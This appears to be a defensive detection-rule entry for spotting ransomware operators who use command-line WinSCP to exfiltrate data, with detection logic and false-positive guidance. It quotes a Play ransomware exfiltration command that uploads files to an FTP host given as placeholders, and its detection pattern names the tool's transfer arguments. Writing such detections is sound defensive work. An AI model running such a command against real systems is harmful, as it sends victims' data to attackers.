edr-win-exfil-winscp-transfer

# WinSCP Command-Line File Transfer ## What This Detects WinSCP executed with command-line arguments indicating scripted or automated file transfer. This catches both explicit protocol URLs (`sftp://`, `ftp://`, `scp://`) and command-mode operation (`/command`, `/console`, `put`). ## Why It Matters WinSCP is the second most common exfiltration tool across ransomware operations, behind Rclone. eSentire documented Hunters International using Rclone as the primary exfil tool with WinSCP as the fallback - a pattern also observed in Play and Akira intrusions. When network controls block Rclone's cloud sync protocols, operators pivot to WinSCP's SFTP/FTP capabilities. Unlike GUI-mode WinSCP (which leaves minimal process creation telemetry), command-line mode with `/command` or protocol URLs in the arguments indicates automated or scripted transfer - the mode operators use. ## Observed In - **Play** - `winscp.exe /command "open ftp://<USER>:<PASS>@<IP>" "put <FILE>" "exit"` - CISA AA23-352A - **Play** - WinSCP installed from `C:\PerfLogs\WinSCP.rar`, executed multiple times for multi-session exfil - **Akira** - WinSCP installed, used, uninstalled, reinstalled - operational cleanup pattern - **Qilin** - WinSCP as alternative to Cyberduck for SFTP exfiltration - **Hunters International** - WinSCP as Rclone fallback (eSentire TRU, Feb 2025) ## Detection Logic ``` Process Creation where: (Image ends with \winscp.exe OR \winscp.com) AND CommandLine contains any of: /command, /console, sftp://, ftp://, scp:// OR Product contains 'WinSCP' AND CommandLine contains any of: put, /upload, synchronize remote ``` ## False Positive Guidance WinSCP is legitimately used for scheduled file transfers in many enterprises (SFTP to payment processors, data feeds, partner integrations). Baseline legitimate WinSCP usage by: - Scheduled task parent process - Known destination IPs - Standard user accounts that run file transfers Alert on WinSCP execution from admin accounts, from non-standard paths (especially `C:\PerfLogs\`, `C:\ProgramData\`, temp directories), or to previously unseen destination IPs. ## Related Threat Profiles - [[Threat Profiles/RaaS/Akira]] - [[Threat Profiles/RaaS/Qilin]]